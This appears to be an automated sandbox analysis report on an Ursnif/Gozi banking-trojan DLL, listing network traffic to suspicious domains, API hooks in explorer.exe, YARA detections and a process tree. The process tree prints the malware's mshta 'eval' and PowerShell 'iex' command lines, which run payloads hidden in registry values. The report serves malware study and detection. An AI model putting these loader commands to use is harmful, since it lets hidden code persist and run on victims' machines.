Feb 12, 2021 10:00:46.506062031 CET	6450	IN	Data Raw: e5 76 61 30 42 34 dd cd 17 89 87 5f 63 5d 07 b7 b1 ea 4f 1e 8e 6b 23 55 61 5b fb 09 93 6a 5a a6 b0 fa 73 50 d1 c2 c9 7c 12 dc e9 d5 15 83 ea dc 23 08 82 e5 b1 67 70 bc 8e ca 74 1c 47 a0 0a 26 e2 2b 48 90 89 b7 c6 6e f4 03 cb 75 7a 14 fd 60 45 e2 Data Ascii: va0B4_c]Ok#Ua[jZsP\|#gptG&+Hnuz`ED/^WmGRA)ZR^ qPg;B2B%$L2LBHEolDm7B&1<3t6Uxp)%\F; o~\|
Feb 12, 2021 10:00:46.506088972 CET	6452	IN	Data Raw: f3 e8 9e 94 f6 61 42 14 b5 a8 69 98 22 49 8a 30 f9 3e 79 e0 9f 06 3f 39 a4 08 cd b8 7d 66 09 90 c8 fe 16 26 72 8c bc b1 69 6f e6 18 f0 b7 ac fc 06 97 2f ec 2d 14 d9 b1 b0 c2 f6 5f ba 34 36 c1 46 dd 43 8d 62 d5 e0 8e e3 ae cf e9 59 c4 3e 80 be 29 Data Ascii: aBi"I0>y?9}f&rio/-_46FCbY>)tl:Th\|\ti<z#_BF)7A>+KL\C%X'dDV/{^C7'kk=,Mv$>&o6xyn^\Zmz{;\_MBcp
Feb 12, 2021 10:00:46.506103039 CET	6453	IN	Data Raw: 67 1a 7d 31 ed 2f 0a 36 67 07 a9 6e ee 4e db 0c ad 99 44 74 af b7 b2 a8 10 55 57 7e d4 b4 b5 bf 41 e3 11 b6 42 f3 df c1 5a 32 13 eb f9 fa 49 d2 af 33 08 e8 75 ae 30 eb d2 8d a5 b3 f8 02 81 43 24 57 c2 e0 03 82 6d fa 1b 2a 3b 90 6f 97 bf 4a e0 b0 Data Ascii: g}1/6gnNDtUW~ABZ2I3u0C$Wm*;oJGr\UU1 ={E^z"PX.<4Q<Cwyc)\|_>@BXE;s7!bCFNB-pqVv(Q[:H18/0IJo!N[
Feb 12, 2021 10:00:46.506114960 CET	6455	IN	Data Raw: bd bb a1 6d 1d 2a 03 0d 76 34 37 fc 6e 09 38 96 8d 7b 4d 37 51 09 86 54 57 b1 80 9c 25 66 23 1b 5f e4 0b 71 9a e4 20 cb f9 8e b5 89 b6 0c bf 63 1d a2 77 86 1e 04 e2 23 de 5b 58 77 cc f4 5e 7c 7b 98 48 0a 43 52 9b 37 0f 9f 47 f8 76 99 fa f2 c9 b3 Data Ascii: m*v47n8{M7QTW%f#_q cw#[Xw^\|{HCR7Gvk -7X:+Q\|G3Q^Lo@c+y&aI)[3c}dMSyON1%ck6s}K$>_{I%Z}}u^=(9+u(lqO
Feb 12, 2021 10:00:46.543467999 CET	6456	IN	Data Raw: 6d 41 f1 73 0a 59 cb 31 a6 39 aa 5f 00 ef a1 a3 0d 41 6f 0d 9e cd 72 40 96 d9 1b d1 51 91 c0 29 48 74 74 cd 87 a9 6d 19 96 ae 62 f7 64 74 51 bf 41 6c 27 9b 61 28 1f 75 3d 3a e8 c7 61 d3 2f 98 7f 32 f7 c8 f8 20 7a 4b 69 a3 25 91 88 52 fb c6 59 37 Data Ascii: mAsY19_Aor@Q)HttmbdtQAl'a(u=:a/2 zKi%RY75*mwd/:%jzp8{5?kcmp(zn.\|R8Y-}S7-{Yx~_w$&@b:JhMih&dp+DyN%?F)iGU_<Ci$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49758	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:00:46.308439970 CET	6440	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: go.in100k.at Connection: Keep-Alive
Feb 12, 2021 10:00:46.399348974 CET	6441	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Feb 2021 09:00:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49760	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:00:47.005774021 CET	6712	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: golang.feel500.at Connection: Keep-Alive
Feb 12, 2021 10:00:47.096822977 CET	6712	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 12 Feb 2021 09:00:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFD88935200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DEC590

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFD88935200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DEC590

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFD8893521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFD88935200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFD8893520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6224 Parent PID: 5772

General

Start time:	09:59:05
Start date:	12/02/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll'
Imagebase:	0x980000
File size:	121856 bytes
MD5 hash:	99D621E00EFC0B8F396F38D5555EB078
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 6352 Parent PID: 6224

General

Start time:	09:59:05
Start date:	12/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1
Imagebase:	0xdd0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3728 Parent PID: 792

General

Start time:	09:59:53
Start date:	12/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6548 Parent PID: 3728

General

Start time:	09:59:53
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2
Imagebase:	0xa20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2268 Parent PID: 792

General

Start time:	10:00:38
Start date:	12/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6900 Parent PID: 2268

General

Start time:	10:00:38
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2
Imagebase:	0xa20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6600 Parent PID: 2268

General

Start time:	10:00:39
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2
Imagebase:	0xa20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6688 Parent PID: 2268

General

Start time:	10:00:42
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2
Imagebase:	0xa20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4616 Parent PID: 2268

General

Start time:	10:00:43
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2
Imagebase:	0xa20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5452 Parent PID: 2268

General

Start time:	10:00:47
Start date:	12/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2
Imagebase:	0xa20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 3540 Parent PID: 3440

General

Start time:	10:00:50
Start date:	12/02/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff7e8b10000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 3548 Parent PID: 3540

General

Start time:	10:00:52
Start date:	12/02/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff743d60000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, Author: CCN-CERT
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4712 Parent PID: 3548

General

Start time:	10:00:53
Start date:	12/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 1864 Parent PID: 3440

General

Start time:	10:00:53
Start date:	12/02/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff7e8b10000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 6200 Parent PID: 1864

General

Start time:	10:00:55
Start date:	12/02/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff743d60000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, Author: CCN-CERT

Chronological Activities

Analysis Process: conhost.exe PID: 6192 Parent PID: 6200

General

Start time:	10:00:56
Start date:	12/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 6684 Parent PID: 3548

General

Start time:	10:01:04
Start date:	12/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
Imagebase:	0x7ff6aac60000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: csc.exe PID: 6444 Parent PID: 6200

General

Start time:	10:01:05
Start date:	12/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
Imagebase:	0x7ff6aac60000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 4660 Parent PID: 6684

General

Start time:	10:01:05
Start date:	12/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP'
Imagebase:	0x7ff7729c0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cvtres.exe PID: 6904 Parent PID: 6444

General

Start time:	10:01:06
Start date:	12/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP'
Imagebase:	0x7ff7729c0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 6556 Parent PID: 3548

General

Start time:	10:01:09
Start date:	12/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
Imagebase:	0x7ff6aac60000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6224 Parent PID: 5772 loaddll32.exeCOMMON

Executed Functions

Function 009C7AFF, Relevance: 47.6, APIs: 25, Strings: 2, Instructions: 317memorylibrarynativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(009DE268), ref: 009C7B1D

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

memset.NTDLL ref: 009C7B4E
RtlInitializeCriticalSection.NTDLL(06288D20), ref: 009C7B5F

Part of subcall function 009CB1E7: RtlInitializeCriticalSection.NTDLL(009DE240), ref: 009CB20B
Part of subcall function 009CB1E7: RtlInitializeCriticalSection.NTDLL(009DE220), ref: 009CB221
Part of subcall function 009CB1E7: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D17C0), ref: 009CB232
Part of subcall function 009CB1E7: GetModuleHandleA.KERNEL32(009DF01D), ref: 009CB25F

Part of subcall function 009C1060: RtlAllocateHeap.NTDLL(00000000,-00000003,77E49EB0), ref: 009C107A

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060), ref: 009C7B88
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D17C0), ref: 009C7B99
CloseHandle.KERNEL32(00000234), ref: 009C7BAD
GetUserNameA.ADVAPI32(00000000,?), ref: 009C7BF6
RtlAllocateHeap.NTDLL(00000000,?), ref: 009C7C09
GetUserNameA.ADVAPI32(00000000,?), ref: 009C7C1E
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 009C7C4E
OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 009C7C63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D17C0), ref: 009C7C6D
CloseHandle.KERNEL32(00000000), ref: 009C7C77
GetShellWindow.USER32 ref: 009C7C92
GetWindowThreadProcessId.USER32(00000000), ref: 009C7C99
CreateEventA.KERNEL32(009DE0D4,00000001,00000000,00000000,61636F4C,00000001,?,?), ref: 009C7D28
RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 009C7D52
OpenEventA.KERNEL32(00100000,00000000,062889B8), ref: 009C7D7A
CreateEventA.KERNEL32(009DE0D4,00000001,00000000,062889B8), ref: 009C7D8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D17C0), ref: 009C7D93
GetLastError.KERNEL32(009D0120,009DE04C,009DE050), ref: 009C7E19
LoadLibraryA.KERNEL32(ADVAPI32.DLL,009D0120,009DE04C,009DE050), ref: 009C7E2D
SetEvent.KERNEL32(?,009C046A,00000000,00000000), ref: 009C7EA6
RtlAllocateHeap.NTDLL(00000000,00000052,009C046A), ref: 009C7EBB
wsprintfA.USER32 ref: 009C7EEB

Strings

ADVAPI32.DLL, xrefs: 009C7E28
0123456789ABCDEF, xrefs: 009C7B66

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemsetwsprintf
String ID: 0123456789ABCDEF$ADVAPI32.DLL
API String ID: 204107308-803475220
Opcode ID: 6dd527203f92ef150144118cdc65169d9148f0fe4bf8a4be20f7b41a82eecd42
Instruction ID: 63c6888728f6e60305fb587bb06264a522b645012a242b4e6c179ed3e83e7f45
Opcode Fuzzy Hash: 6dd527203f92ef150144118cdc65169d9148f0fe4bf8a4be20f7b41a82eecd42
Instruction Fuzzy Hash: 27B1A1709AD3059FC720AFA5DC85F2BBBA9EB84704B50481FF146D72A1DB709884DF62

Uniqueness

Uniqueness Score: -1.00%

Function 009BA027, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94threadmemorynativeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 009BA052
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 009BA05F
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 009BA0EB
GetModuleHandleA.KERNEL32(00000000), ref: 009BA0F6
RtlImageNtHeader.NTDLL(00000000), ref: 009BA0FF
RtlExitUserThread.NTDLL(00000000), ref: 009BA114

Part of subcall function 009C8B88: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,009BA08D,?), ref: 009C8B90
Part of subcall function 009C8B88: GetVersion.KERNEL32 ref: 009C8B9F
Part of subcall function 009C8B88: GetCurrentProcessId.KERNEL32 ref: 009C8BAE
Part of subcall function 009C8B88: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 009C8BCB

Part of subcall function 009B8CA2: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 009B8CF4
Part of subcall function 009B8CA2: memcpy.NTDLL(?,?,?,?,?,?), ref: 009B8D85
Part of subcall function 009B8CA2: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 009B8DA0

